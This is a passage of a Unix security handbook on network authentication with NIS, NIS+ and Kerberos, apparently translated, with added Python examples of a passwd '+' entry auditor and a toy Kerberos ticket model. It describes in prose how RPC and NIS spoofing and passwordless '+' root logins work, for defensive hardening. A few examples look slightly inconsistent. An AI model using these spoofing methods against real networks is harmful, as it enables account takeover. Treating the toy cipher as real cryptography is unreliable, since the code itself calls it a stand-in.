Now suppose the private key does not belong to a particular individual but to a role that he holds in a company. Consider, for example, a private key that is used to sign purchase orders. Is it acceptable for two people to hold that private key? Or should the company create two private keys, one for each of the people who need to sign purchase orders?

Network authentication

Many solutions have been proposed for the problem of authenticating users in environments where users have access to several workstations connected through an untrusted and possibly insecure network. For simplicity, we would prefer the user's account information to be stored on a central server, but for reliability we may want the central server's information to be replicated in real time on other servers. For security reasons, we need to be sure that when a user logs in to a workstation, the user's identity is verified against the central server's information without confidential information being disclosed on the untrusted network. Although solutions to this problem have been offered, such as NIS, NIS+, Kerberos, and LDAP, none of them has been adopted universally and definitively. NIS and NIS+ were originally used in environments with multiple Unix workstations; Kerberos and LDAP, besides being used in those environments, also form an important part of Windows NT-based operating systems.
Sun's Network Information Service (NIS)

One of the oldest and best-known distributed database administration systems is Sun's Network Information Service (NIS). A few years later NIS+ was released, an improved but more complicated version of NIS. More recently, LDAP (Lightweight Directory Access Protocol) servers have become more popular, and Sun users are now moving to LDAP-based services. Although Sun has asked its users not to use NIS, for security reasons, it is still used in many environments.

NIS is a distributed database system that lets several computers share password files, group files, host tables, and other files over the network. Although the files appear to exist on every computer, they are actually stored on only one computer, called the NIS master server (and possibly replicated on a backup or second server). The other computers on the network, the NIS clients, can use the databases stored on the master server (such as the password file) as though the information were stored locally. These databases are called NIS maps.

With NIS a large network is easier to administer, because all of the account and configuration information is stored on one computer, yet it can be used on every system on the network.

Some files are replaced by their NIS maps, and others have the map data added to them. For the latter files, NIS uses the plus sign (+) to tell the system to stop reading the file (for example, /etc/passwd) and to start querying the NIS server for the appropriate NIS map (for example, passwd). The server usually maintains several maps, each based on one of the files stored in the /etc directory, such as /etc/passwd, /etc/hosts, and /etc/services. For example, the /etc/passwd file on a client might look like this:

    root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
    +::999:999:::

This causes a program that reads /etc/passwd on the client to issue a network request to read the passwd map. The passwd map is usually built from the /etc/passwd file on the server, although this is not always the case. When NIS scans the /etc/passwd file, it stops at the first line that matches. You can restrict the import of accounts to particular users by adding a username after the "+" sign. You can also exclude particular usernames from being imported by inserting a line that begins with the minus sign (-).

NIS also lets you selectively import some fields from the /etc/passwd database. For example, if you have the following entries in the /etc/passwd file:

    root:si4NOjF9Q8JpE:0:1:Mr. Root:/:/bin/sh
    +:*:999:999:::

then all of the entries in the NIS passwd map are imported, but each of them has its password entry replaced with "*", which prevents it from being used on the client machine. You still obtain all of the UIDs and account names, so that file listings show the owners of files and directories as usernames. The entry also allows the ~user notation in the various shells to map correctly to the user's home directory (assuming that the directory is mounted using NFS).

NIS domains

When you configure an NIS server, you must specify an NIS domain. These domains are not the same as DNS domains. DNS domains identify a region of the Internet, whereas NIS domains identify an administrative group of computers. The Unix domainname command is used to display and change the name of a domain. A computer can be in only one NIS domain at any given time, but it can serve any number of NIS domains.
Do not use your Internet domain as your "netgroup" domain. Setting the two domains to the same name has caused problems with some versions of sendmail. Using an NIS domain name that is easily guessed also creates security risks. Intruders' tools that try to exploit flaws in NIS and NFS almost always begin by trying variations of the Internet domain name as the NIS domain name. (Of course, the NIS domain name can still be determined by other means.)

NIS netgroups

With NIS netgroups you can create groups of users or of machines on the network. Netgroups are in principle similar to local user groups, but much more complicated.

The primary purpose of netgroups is to simplify configuration files and to reduce the chance of error. By defining netgroups and using them correctly, you can raise the level of security of the system by limiting the individuals and machines that have access to critical resources.

The netgroup database is kept on the NIS master server in the file /usr/etc/netgroup or /etc/netgroup. The file consists of one or more lines of the following form:

    Groupname member1 member2 ...

Each member can specify a host and an NIS domain. Members have the following form:

    (hostname, username, domainname)

If the username is left empty, then every user at the named host is a member of the group. If the domainname is left empty, then the current domain is assumed. [158]

[158] The best approach is to build netgroups in which every member has a username (a netgroup of users), or in which every member has a hostname but no username (a netgroup of hosts). Building netgroups in which some members are users and some are hosts increases the chance of error.

Installing netgroups

The program /etc/yp/makedbm (sometimes found at /usr/etc/yp/makedbm) processes the netgroup file into a number of database files that are stored at the following paths:

    /etc/yp/domainname/netgroup.dir
    /etc/yp/domainname/netgroup.pag
    /etc/yp/domainname/netgroup.byuser.dir
    /etc/yp/domainname/netgroup.byuser.pag
    /etc/yp/domainname/netgroup.byhost.dir
    /etc/yp/domainname/netgroup.byhost.pag

Note that on some machines /etc/yp may be a symbolic link to /var/yp.

If you have a small organization, you can create just two netgroups: one for all of the users and one for all of the client machines. These groups make it easier to create and administer your system's configuration files.

If you have a larger organization, you can create several groups. For example, you can create one group for the users of each department. You can then have a master group that contains all of the subgroups. Of course, you can do the same for computers.

Consider a science department with a structure like the following:

    Math (mathserve,,) (math1,,) (math2,,) (math3,,)
    Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,)
    Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,)
    Science Math Chemistry Biology

Netgroups are important from a security standpoint because you use them to restrict the users and machines on the network that can access the information stored on your computers. You can use netgroups in NFS files to limit who has access to your partitions, and in data files such as /etc/passwd to limit the entries that are imported into a system.
Using netgroups to restrict the import of accounts

You can use the netgroup facility to control which accounts are imported through the /etc/passwd file. For example, if you want to import only the accounts of a specific netgroup, use the plus sign (+) and an at sign (@) followed by the name of the netgroup:

    root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
    +@operators::999:999:::

The entries above bring in, from the NIS map, the password entries of the users listed in the operators netgroup. You can also exclude users or netgroups with the minus sign (-), provided that you list the exclusions before the netgroups.

The +@netgroup and -@netgroup notations do not work on all versions of NIS, and on the remaining versions they have not worked reliably so far. If you intend to use these features, test your system to make sure that they behave as they should. Note that merely reading the documentation is not sufficient for this purpose.

Limitations of NIS

The use of NIS has been the starting point of many successful intrusions into Unix networks. Because NIS controls user accounts, if you can convince an NIS server to announce to the whole network that you have an account, you can use that account to break into a client on that network. NIS can also make confidential information, such as encrypted passwords, publicly available.
There are several design flaws in various vendors' implementations of NIS that allow a user to reconfigure and spoof the NIS system. This spoofing can be done in two ways: by spoofing the remote procedure call system, and by spoofing NIS.

Spoofing RPC

Remote procedure call (RPC) lets systems connected to the network invoke functions on other systems. NIS depends on the RPC portmapper, a daemon that maps the names of RPC services to the IP port numbers at which those services can be contacted. Servers that use RPC register themselves with the portmapper when they start, and remove themselves from the portmapper database when they exit or are reconfigured.

In early versions of the portmapper, any program could register itself as an RPC server, which gave attackers the opportunity to register their own NIS servers and to answer requests with their own password files. Most current versions of the portmapper reject requests to register or delete services if they come from a remote machine, or if they refer to a privileged port and arrive over a connection initiated from an unprivileged port. Thus only the superuser can make requests to add or delete service mappings for privileged ports, and all requests can be made only locally. However, not every vendor's version of the portmapper daemon performs these checks.

Note that NFS and some NIS services usually register on unprivileged ports. In theory, even with the checks listed above, an attacker could replace one of these services with a specially written program in order to respond to system requests in a way that compromises the security of the system.

Spoofing NIS

NIS clients obtain information from an NIS server using RPC. A local daemon named ypbind caches the contact information for the corresponding NIS server daemon, named ypserv. ypserv may be running locally or remotely.
Under early versions of the SunOS NIS service (and possibly versions from other vendors), it was possible to instantiate a program that behaved like ypserv and answered ypbind requests. The local ypbind daemon could then be instructed to use that program instead of the real ypserv. An attacker could therefore configure the system so that, for example, his own version of the password file was used to answer login requests!

Current NIS implementations of ypbind have a -secure (or -s) command-line option that can be given when the daemon is started. If the option is used, the ypbind daemon will not accept any information from ypserv servers that are not running on privileged ports. So if a user tries to load a fake ypserv daemon, the attempt is ignored. There is usually no good reason not to use the -secure option.

Unfortunately, the -secure option has a flaw. If an attacker can compromise the root account on any other machine connected to the local network and run a copy of ypserv there using his own NIS information, he only needs to point the target's ypbind at that server to carry out the attack. The compromised server may be running on a privileged port, and so its responses will not be rejected. An attacker could also write a fake ypserv that runs on a PC-compatible system. Privileged ports have no special meaning in that case, so any user can run the server on any port and supply information to the target ypbind process.

NIS is confused about "+"

Even when NIS clients contact the correct servers, NIS can cause other security problems. For example, a combination of mistakes in the initial development and the redevelopment of NIS has caused confusion about the NIS plus sign (+) in the /etc/passwd file.
If you use NIS, be very careful that the plus sign (+) is in the /etc/passwd file on clients, and not on servers. On NIS servers under some versions of Unix, the plus sign can be interpreted as a username. The simplest way to avoid this problem is to make sure that there is no account named "+" on the NIS server.

Trying to figure out what should be put on the server is another problem. In early versions of NIS, the following line was also present:

+::0:0:::

which was correct on SunOS and Solaris.

Unfortunately, this one line caused a problem. When NIS was not running, the plus sign was sometimes treated as an account name, and anyone could log in to the computer by typing "+" and reach a command prompt without a password. Worst of all, that person logged in with the privileges of the most privileged user. [160]

One way to minimize the risk on NIS clients was to use a password for the "+" user. Consider the plus-sign entry in the following form:

+::0:0:::

Unfortunately, under some versions of NIS, this entry means "import the passwd map, but change all of the encrypted passwords to """, which naturally prevented everybody from logging in. So this entry was not right either!

One of the simplest ways to deal with this confusion is to use the username "+" to try to log in to NIS clients and servers. You can also unplug the network cable and then try to log in, to simulate what happens when the NIS server is unavailable to the computer. In either case, you should not be able to log in by typing just "+" as the username. This test will tell you whether the server is properly configured.

If you are running a recent version of your operating system, do not assume that your system is immune to the NIS subsystems' confusion about "+". In particular, some versions of NIS on Linux also make this mistake.

[160] In Sun's implementation of NIS, and perhaps some other implementations, this danger can be mitigated somewhat by preventing local users from changing the UID and GID values of the NIS entries in the passwd file to zero or to other values.

Improving NIS security

NIS databases contain sensitive information. There are several ways to prevent unauthorized disclosure of NIS database information. As with most security improvements, you can combine several of these approaches to obtain a layered defense in depth:

1. Protect your site with a firewall, or at least a smart router, and do not allow RPC-related UDP packets to pass between your internal network and the outside world. Unfortunately, because RPC is based on the portmapper, the actual UDP port that is used is not a fixed, known port. In practice, the only safe strategy is to block all UDP packets except those that you specifically allow.

2. Use a version of portmapper that lets you specify a list of computers (by hostname or IP address) whose access to particular RPC servers should be allowed or denied. If you have no firewall, an attacker can still probe for each RPC service without going through the portmapper, but if RPC clients first try to contact the portmapper, an improved version of NIS can warn of a potential attack.

3. See whether your NIS uses the /var/yp/securenets file on NIS servers. If this file exists, it can specify a list of networks that may receive NIS information. Other versions of NIS may provide other ways for ypserv to filter the addresses that are allowed to access a particular RPC server.

4. Don't use NIS so much that you forget DNS! If your policy is that nobody outside should be able to learn your organization's IP addresses, run two nameservers: one for internal use and one for external use.
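The "+" entry problems described above can be checked mechanically before anyone tries the login test. The following auditor is an added example, not code from the handbook; the function name audit_passwd, the role argument, the severity labels and the sample files are assumptions made for illustration.

```python
def audit_passwd(text, role):
    """Audit passwd-format text for risky NIS '+' entries.

    role is 'server' or 'client' (assumption: the caller knows which role
    the host plays). Returns a list of (line_no, level, message) tuples.
    """
    if role not in ("server", "client"):
        raise ValueError("role must be 'server' or 'client'")
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # Pad short lines so a bare "+" still yields seven fields.
        fields = (line.split(":") + [""] * 7)[:7]
        name, passwd, uid, gid = fields[:4]
        if not name.startswith("+"):
            continue
        if role == "server":
            # The text: the plus sign belongs on clients, not on servers.
            findings.append((line_no, "high",
                             "'+' entry on an NIS server; some Unix versions "
                             "treat '+' as a username"))
            continue
        if "0" in (uid, gid):
            # "+::0:0:::" becomes a passwordless superuser login when the
            # plus sign is read as an account name (for example, NIS down).
            level = "critical" if passwd == "" else "high"
            findings.append((line_no, level,
                             "'+' entry forces UID/GID 0 onto the entry"))
        elif uid or gid:
            findings.append((line_no, "medium",
                             "'+' entry overrides the UID/GID of NIS accounts"))
        if name == "+" and passwd:
            # The text: some NIS versions apply this field to every imported
            # account, which locks all users out.
            findings.append((line_no, "medium",
                             "password field on '+' may replace every "
                             "imported password under some NIS versions"))
    return findings


# Constructed sample files (not taken from any real system).
CLIENT_RISKY = """root:x:0:0:root:/root:/bin/sh
alice:x:1000:100:Alice:/home/alice:/bin/sh
+::0:0:::
"""
CLIENT_PLAIN = "root:x:0:0:root:/root:/bin/sh\n+::::::\n"
CLIENT_WITH_PASSWORD = "+:LOCKED:0:0:::\n"

if __name__ == "__main__":
    for label, text, role in (("risky client", CLIENT_RISKY, "client"),
                              ("plain client", CLIENT_PLAIN, "client"),
                              ("server", CLIENT_PLAIN, "server")):
        print(label, audit_passwd(text, role))
```

A clean result does not replace the login test with the username "+", because how the entry is interpreted depends on the NIS version in use.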
Sun's NIS+

NIS was designed for small, friendly computing environments. When Sun Microsystems' customers began building networks with thousands of workstations, it became clear that NIS was impractical and insecure for use by large companies. In 1990 Sun Microsystems began developing an NIS replacement, and a few years later the system was released under the name NIS+.

NIS+ quickly gained a reputation for being broken, and its early versions appeared to have been practically untested, since they rarely worked as intended. In addition, its documentation was very confusing and incomplete. Sun eventually fixed the defects, so that today NIS+ is a more reliable system for secure network management and control. An excellent reference for people who use NIS+ is the book All About Administrating NIS+ (SunSoft Press, Prentice Hall, 1994) by Rick Ramsey.

What NIS+ does

NIS+ creates databases on the network that are used to store information about the organization's computers and users. NIS+ calls these databases "tables". These tables are functionally similar to NIS maps. Unlike NIS, NIS+ allows incremental updates of the information over the network.

Each NIS+ domain has exactly one NIS+ root server. This is a computer that holds the master copy of the information stored in the NIS+ root domain. The information stored on this server can be replicated, which allows the network to remain usable even when the root server is down or unavailable. NIS+ servers can also be used for subdomains.

Entities that communicate using NIS+ are called NIS+ principals. An NIS+ principal can be a host or an authenticated user. Each NIS+ principal has a public key and a private key, which are stored on the NIS+ server in the domain.
All communication between NIS+ servers and principals takes place over "Secure RPC", a version of RPC that authenticates and protects procedure calls using DES encryption. This makes the communication resistant to eavesdropping and spoofing attacks. NIS+ also oversees the creation and management of Secure RPC keys. With NIS+, every member of the organization is able to use Secure RPC.

NIS+ tables and related matters

All information stored on NIS+ servers is stored in the form of objects. NIS+ supports three basic kinds of objects. "Tables" store configuration information; "groups" refer to sets of NIS+ principals and are used to authenticate them; and "directories" are containers for tables, groups, and other directories, and give the NIS+ server a tree structure.

NIS+ predefines 16 tables, including tables for hosts and networks, protocols and services, user accounts and passwords, user groups and netgroups, mail aliases, and others. Users are free to create additional tables of their own.

Using NIS+

Using NIS+ can be very satisfying. When a user logs in to a workstation, the login program automatically retrieves the user's NIS+ security credentials and attempts to decrypt them with the user's password.

If the entered password and the password stored in NIS+ are the same (which is usually the case), the NIS+ keyserv process keeps the user's private key in memory, and as a result the user gets near-direct access to all Secure RPC services (in other words, the intermediate authentication layer becomes invisible). If the entered password and the password stored in NIS+ are not the same, the user must log in to the NIS+ domain manually using the keylogin command. NIS+ users change their passwords with the nispasswd command, which works much like the standard Unix passwd command.
NIS+ security is implemented by providing a means of authenticating users, and by creating access control lists that control the ways in which authenticated users can interact with the information stored in NIS+ tables. NIS+ provides two kinds of authentication: local authentication is based on the UID that executes an NIS+ command and is used extensively for administering NIS+ root servers, and DES authentication is based on Secure RPC.

Every NIS+ object has an "owner", which is usually its creator (an object's owner can be changed with the nischown command). NIS+ objects also have access control lists, which are used to control which principal has what kind of access to the object: read, modify, create, delete, or merge. Four kinds of principals can have access to an object: nobody (unauthenticated requests), the owner of the object, principals that are in the same group as the object, and other authenticated principals.

NIS+ tables may grant additional access privileges to their individual rows, columns, or entries. Thus all authenticated users have read access to all parts of a table, but each user can modify only the row of the table that belongs to his own account. Note that because the permissions on individual rows, columns, and entries can only broaden the access control list, more restrictive rules cannot be applied.

Limitations of NIS+

If NIS+ is properly configured, it can be a very secure system for authentication and network administration. However, as with all security systems, it is possible to make a mistake in configuring or managing NIS+ that results in reduced security for the network that NIS+ protects. A few points to be aware of follow.

Do not run NIS+ in NIS compatibility mode

NIS+ has an "NIS compatibility" mode that allows the NIS+ server to interoperate with NIS clients. If you run NIS+ in this mode, any NIS server on your network (and perhaps even on other networks) will be able to access any piece of information stored on the NIS+ server.
Manually inspect the permissions of NIS+ objects at regular intervals

There is as yet no NIS+ integrity-checking software, so NIS+ tables, directories, and groups must be inspected manually at regular intervals. Watch for objects that can be modified by nobody or by everybody, and for tables in which these two classes of principals can create new objects.

Secure the computers on which your NIS+ servers run

An NIS+ server is at most as secure as the computer on which it runs. If attackers can obtain "root" access on an NIS+ server, they can make any change they like to the NIS+ domain, including creating new users, changing user passwords, and even changing the NIS+ server's master password.

Use NIS+ security level 2 on servers

NIS+ servers can run at three security levels, named 0, 1, and 2. Full access control and authentication are enabled only at level 2, and NIS+ servers should be run only at level 2.

Kerberos

In the late 1980s at the Massachusetts Institute of Technology (MIT), hundreds of powerful workstations with large displays, fast (for the time) processors, small disks, and Ethernet interfaces replaced an older system made up of terminals and a few timesharing computers. The goal was for users to be able to reach their files and the network from any of the computers.
As soon as the workstations went into service, the problem of network eavesdropping became painfully obvious. Because the network was accessible from everywhere, nothing prevented students (or attackers from outside the institute) from running network sniffing programs. It was nearly impossible to prevent students from learning the workstations' superuser password or from rebooting them in single-user mode. To complicate matters further, many of the computers on the network were IBM PC/ATs running software that lacked even the rudiments of computer security. Something had to be done to protect students' files on the network at least as well as they had been protected on the earlier timesharing system.

MIT's eventual solution to this security problem was "Kerberos", an authentication system that used DES cryptography to protect sensitive information, such as passwords, on open networks. When a user logs in to a workstation that is running Kerberos, the Kerberos server issues a "ticket" for that user. The user's ticket can be opened only with the user's password, and it contains the information needed to obtain other tickets. From then on, whenever the user wants to access a network service, he must present a ticket specific to that service. Because all of the information in Kerberos tickets is encrypted before it is sent over the network, the transmitted information cannot be eavesdropped.

Kerberos 4 and Kerberos 5

Kerberos has gone through five major revisions to date, and two versions of Kerberos are currently in use in the marketplace.
Kerberos 4 is more efficient than Kerberos 5 but more limited. For example, Kerberos 4 can work only over TCP/IP networks, has not been upgraded for several years, and is now considered obsolete. In early 1996, graduates of the COAST laboratory (which merged into the CERIAS research center in 1998) at Purdue University discovered a profound weakness in the way Kerberos 4 keys were generated that allowed an attacker to guess session keys within a few seconds. Although a fix for this vulnerability was widely distributed, some Kerberos 4 implementations have since been found to be vulnerable to buffer overflow attacks as well, and no fix has been issued for them.

Kerberos 5 fixed the known problems of the Kerberos protocol and made it more resistant to common network attacks. Kerberos 5 is also more flexible and can work with other kinds of networks. Kerberos 5 also has provisions for working with encryption algorithms other than DES. Although algorithms such as triple DES have been implemented, their use is not widespread, mostly because of older programs that have used encryption.

Finally, Kerberos 5 also has several new features: delegation of authentication, tickets with expiration times of more than 21 hours, renewable tickets, tickets that become active at some time in the future, and many other options. If you want to use Kerberos, Kerberos 5 is recommended. The IETF has worked on revising and clarifying RFC 1510, which defines Kerberos 5, and has proposed several anticipated extensions to the protocol.

Kerberos authentication

Kerberos authentication is based entirely on knowledge of the passwords that are stored on the Kerberos servers. Unlike Unix passwords, which are encrypted with a one-way algorithm, a Kerberos password is stored on the server and encrypted with a conventional algorithm, in most cases DES, and can therefore be decrypted by the server when needed. The user proves his identity to the Kerberos server by demonstrating that he knows the key in use.
The fact that the Kerberos server has access to the user's decrypted password is a consequence of the fact that Kerberos does not use public key cryptography. [173] This is a serious drawback of the Kerberos system. It means that the server must be both physically secure and "computationally secure". The server must be physically secure so that the server cannot be stolen and all users' passwords disclosed. The server must also be immune to login attacks, because if an attacker can log in to the server and gain "root" access, he can again steal all of the passwords.

Kerberos was designed so that its server can be stateless. The server simply answers users' requests and issues tickets when needed. This design makes it relatively easy to create replicated, secondary servers that can answer authentication requests when the primary server is unavailable. Unfortunately, these secondary servers need complete copies of the entire Kerberos database, which means that they too must be both physically and computationally secure.

Initial login

For the user, logging in to a workstation that uses Kerberos is like logging in to an ordinary computer system: he types his username and password, and if they are correct he is logged in and then has access to files, electronic mail, printers, and similar resources.

What happens behind the scenes, however, is much more complicated. When the workstation's login program, sshd [174], or an authentication library such as PAM (or another network daemon) knows about Kerberos, it uses the Kerberos system to authenticate the user.
[173] Public key cryptography is not used in Kerberos because it was still protected by intellectual property law when Kerberos was developed. There is an IETF draft, "Public Key Cryptography for Initial Authentication in Kerberos", that presents ways of integrating public key smart cards with Kerberos. This proposal has been implemented by Microsoft.

[174] OpenSSH patches for using Kerberos 5 authentication are available at http://www.sxw.org.uk/computing/patches/openssh.html. Although SSH has also been used alongside Kerberos 4, it is very hard to get the two systems to interoperate. Fortunately, version 2 of the SSH protocol can use the same security layer as Kerberos 5 (GSSAPI), which simplifies matters considerably. The IETF draft that covers the integration of these systems is draft-ietf-secsh-gsskeyex.

First, the Kerberos client must know how to find the Kerberos server. Each client can be configured manually for this (traditionally in the krb5.conf file), or the Kerberos servers can be advertised with DNS SRV records, as described in the IETF Internet-Draft draft-ietf-krv-wg-krb-dns-locate.

In Kerberos 4, after you enter your username, the workstation sends a message to the Kerberos authentication server. [175] This message contains your username and indicates that you are trying to log in.
The Kerberos server checks its database for your record, and if you are recognized as a valid user, it sends you a ticket-granting ticket that is encrypted with the message digest of your password. The workstation then asks you to enter your password and finally tries to decrypt the encrypted ticket with the password you supplied. If the decryption succeeds, the workstation does not store your password and uses the ticket-granting ticket exclusively. If the decryption fails, the workstation knows that you supplied the wrong password and asks you to try again to enter the correct password.

In Kerberos 5, the workstation waits for you to enter your password before it contacts the server. It then sends the Kerberos authentication server a message containing your username and the current date, encrypted with your password. The server looks up your username, finds your password, and tries to decrypt the encrypted date. If the server can decrypt the date (which will naturally then be the current date), it creates a ticket-granting ticket, encrypts it with your password, and sends it to you. [176]

The ticket-granting ticket is a block of data containing a session key and a ticket for the Kerberos ticket-granting service, encrypted with both the session key and the ticket-granting service's key. The user's workstation can now contact the Kerberos ticket-granting service to obtain tickets for any principal within the Kerberos realm, that is, the set of servers and users known to the Kerberos server.

[175] According to the Kerberos papers and documentation, there are logically two kinds of Kerberos server: the authentication server and the ticket-granting service. Some commentators think this view is inaccurate, because the whole Kerberos system physically uses only one server, the Kerberos server or key server.
[176] Why did the protocol change? Kerberos 4 tried to minimize the number of times the user's password was stored on the workstation. Unfortunately, this made it easy to guess the passwords of Kerberos 4 ticket-granting tickets offline. In Kerberos 5 the workstation must show the Kerberos authentication server that the user knows the correct password. This is a more secure system, although because the user's encrypted ticket-granting ticket is sent from the server to the workstation, it can still be stolen by an attacker and attacked with an exhaustive key search.

For example, when a user first tries to access his files from a Kerberos workstation, the system software on the workstation contacts the ticket-granting service and requests a ticket for the file server. The ticket-granting service returns to the user a ticket for the file server. The returned ticket contains another ticket, encrypted with the file server's password, which the user's workstation can present to the file server in order to request files. This ticket contains the user's authenticated name, the expiration time, and the Internet address of the user's workstation. The user's workstation then presents this ticket to the file server. The file server decrypts the ticket using its own password, and then builds a mapping between the user's workstation (UID, IP address) and a UID on the file server. Kerberos puts the time of day in requests to prevent a request from being captured and sent again from the same host at a later time (for example, in a replay attack by an eavesdropping attacker).
Kerberos has several security advantages. Passwords are stored on the Kerberos server rather than on individual workstations, and they are never transmitted over the network, encrypted or otherwise. The Kerberos authentication server can authenticate the user because the user knows his password, and likewise the user can authenticate the Kerberos server because that server also knows the user's password. Other Kerberos services can also authenticate the user, because the user presents a ticket that was issued by the ticket-granting service and encrypted with the destination service's key.

An eavesdropper who steals a ticket from the Kerberos server cannot use it, because it is encrypted with a key (the key of a Kerberos service, or one derived from the user's password) that the attacker does not know.

Authentication, data integrity, and confidentiality

Kerberos is a general-purpose system for sharing principals' secret keys over the network. Normally Kerberos is used only for authentication. However, the ability to exchange keys can also be used to ensure the integrity of data and to keep it confidential.

If eavesdropping is a serious threat, all of the information transmitted between the workstation and the service can be encrypted with a key that has been exchanged between the two principals. Unfortunately, encryption reduces performance. At MIT, encryption is used for transmitting highly sensitive information such as passwords, but not for most data, such as files and electronic mail.

Tickets issued by Kerberos expire after 8 hours; this technique is intended to prevent replay attacks. [177] So after 8 hours you must run the kinit program again and enter your username and password once more so that the Kerberos ticket-granting service issues a new ticket for you.
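The Kerberos 5 login and ticket exchange described above, with both sides' messages, as an added example (not code from the handbook or from any Kerberos distribution). Assumptions: a toy HMAC-based sealing function stands in for DES, PBKDF2 stands in for the password-to-key step, and the names KDC, login, request_ticket and service_accepts and the 300-second clock-skew limit are invented here.

```python
import hashlib
import hmac
import json
import os

TICKET_LIFETIME = 8 * 3600  # tickets expire after 8 hours, as in the text
MAX_SKEW = 300              # assumption: tolerated clock difference, seconds

def key_from_password(password, principal):
    # Assumption: PBKDF2 stands in for Kerberos' password-to-key step.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), principal.encode(), 10_000)

def _keystream(key, nonce, length):
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]

def _split(key):
    # Separate sub-keys for encryption and for the integrity tag.
    return (hmac.new(key, b"enc", hashlib.sha256).digest(),
            hmac.new(key, b"mac", hashlib.sha256).digest())

def seal(key, obj):
    """Toy authenticated encryption standing in for DES; returns a hex string."""
    enc_key, mac_key = _split(key)
    nonce = os.urandom(16)
    plain = json.dumps(obj).encode()
    body = bytes(a ^ b for a, b in zip(plain, _keystream(enc_key, nonce, len(plain))))
    tag = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    return (nonce + tag + body).hex()

def unseal(key, blob_hex):
    """Return the sealed object, or None if the key is wrong or data was altered."""
    enc_key, mac_key = _split(key)
    blob = bytes.fromhex(blob_hex)
    nonce, tag, body = blob[:16], blob[16:48], blob[48:]
    expected = hmac.new(mac_key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    plain = bytes(a ^ b for a, b in zip(body, _keystream(enc_key, nonce, len(body))))
    return json.loads(plain)

class KDC:
    """Authentication server and ticket-granting service in one process."""
    def __init__(self):
        self.user_keys, self.service_keys = {}, {}
        self.tgs_key = os.urandom(32)

    def add_user(self, name, password):
        self.user_keys[name] = key_from_password(password, name)

    def add_service(self, name):
        self.service_keys[name] = os.urandom(32)
        return self.service_keys[name]

    def authenticate(self, user, preauth, addr, now):
        # Kerberos 5 style: the client first proves it knows the password.
        key = self.user_keys.get(user)
        stamp = unseal(key, preauth) if key else None
        if stamp is None or abs(now - stamp["time"]) > MAX_SKEW:
            return None
        session = os.urandom(32).hex()
        tgt = seal(self.tgs_key, {"user": user, "addr": addr, "session": session,
                                  "expires": now + TICKET_LIFETIME})
        return seal(key, {"session": session, "tgt": tgt})

    def grant(self, tgt, authenticator, service, now):
        # Only the ticket-granting service can open the TGT.
        info = unseal(self.tgs_key, tgt)
        if info is None or now >= info["expires"] or service not in self.service_keys:
            return None
        proof = unseal(bytes.fromhex(info["session"]), authenticator)
        if proof is None or abs(now - proof["time"]) > MAX_SKEW:
            return None
        return seal(self.service_keys[service],
                    {"user": info["user"], "addr": info["addr"], "expires": info["expires"]})

def login(kdc, user, password, addr, now):
    """Workstation side: returns {'session', 'tgt'} or None on a wrong password."""
    key = key_from_password(password, user)
    reply = kdc.authenticate(user, seal(key, {"time": now}), addr, now)
    return unseal(key, reply) if reply else None

def request_ticket(kdc, creds, service, now):
    # The timestamp sealed under the session key shows the TGT holder knows that key.
    authenticator = seal(bytes.fromhex(creds["session"]), {"time": now})
    return kdc.grant(creds["tgt"], authenticator, service, now)

def service_accepts(service_key, ticket, addr, now):
    """File-server side: returns the authenticated user name, or None."""
    info = unseal(service_key, ticket)
    if info is None or info["addr"] != addr or now >= info["expires"]:
        return None
    return info["user"]
```

The password never crosses the wire in this model, and a captured pre-authentication message or ticket stops working once its timestamp or expiry has passed.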
On single-user workstations, Kerberos provides significantly more security than ordinary passwords alone. However, if two people are logged in to one workstation at the same time, the workstation authenticates both users, and from then on those two users can impersonate each other. This threat was very significant at MIT, so remote login services were disabled on the workstations to keep attackers from logging in while a legitimate user was authenticated. It is also possible for someone to subvert the local software in order to capture the user's password as it is typed.

Getting Kerberos

Kerberos or similar security systems are available today from several companies, and they are also a standard part of operating systems such as Solaris, Mac OS X, and many versions of Linux and BSD. Microsoft Windows has included a version of Kerberos 5 since Windows 2000. It is also possible to use Kerberos between Unix machines and Windows platforms. [178]

If you have to install Kerberos from scratch, the source code of MIT Kerberos is available to citizens of the United States and Canada at http://web.mit.edu/kerberos/www/ and to others at http://www.crypto-publish.org. At these addresses you can also find official updates, patches, and bug announcements. Kerberos has had several known bugs, so it is very important to use the latest version. There is also a free implementation of Kerberos called "Heimdal" that is under active development and is highly compatible with MIT Kerberos. You can get Heimdal from http://www.pdc.kth.se/heimdal/. The configuration changes required to fit Kerberos to your system are critical; if you have to make them yourself, refer to the documentation supplied with Kerberos for more information.

[177] In some configurations a maximum lifetime can be set for a key.

[178] Note that Microsoft has made proprietary changes to the Kerberos protocol, the effect of which is to force Windows clients to use Windows Kerberos servers. So in a mixed Windows and Unix environment, it is better for the Kerberos servers to be Windows 2000 machines, so that both Windows clients and Unix clients can be used.

Kerberos and LDAP

Kerberos and LDAP (which is described in the next section) combine well. Kerberos can be used to authenticate and secure LDAP queries and updates. Conversely, an LDAP database can store user information that is richer than the data protected by Kerberos alone, such as the user's home directory, shell, phone number, or other organizational information. Together, these two services can provide all of the functionality of NIS and NIS+, which is why they are so widely used. [179]

LDAP is sometimes used to store Kerberos keys. The Windows implementation of Kerberos uses Microsoft Active Directory services (an implementation of LDAP) to store Kerberos keys. Heimdal Kerberos supports this capability, but MIT Kerberos does not; this is no cause for concern, however, because in MIT Kerberos these keys are stored on the Kerberos servers themselves.
Limitations of Kerberos

Although Kerberos is an excellent solution to a fundamental problem, it still has many shortcomings, which are noted below.

Every network service must be individually modified for use with Kerberos

Because of the design of Kerberos, every program that wants to use Kerberos must be modified. The process of making these changes to an application is usually called "Kerberizing". This usually requires that the application's source code be available, or that the application use a security framework that is already integrated with Kerberos (such as PAM, which is discussed at the end of this chapter).

Kerberos does not work well in a time-sharing environment

Kerberos is designed for an environment in which there is one user at each workstation. If a user shares his computer with several other people, it is possible for the user's ticket to be stolen by an attacker. The stolen tickets can then be used to obtain services fraudulently.

Kerberos requires a secure and available Kerberos server

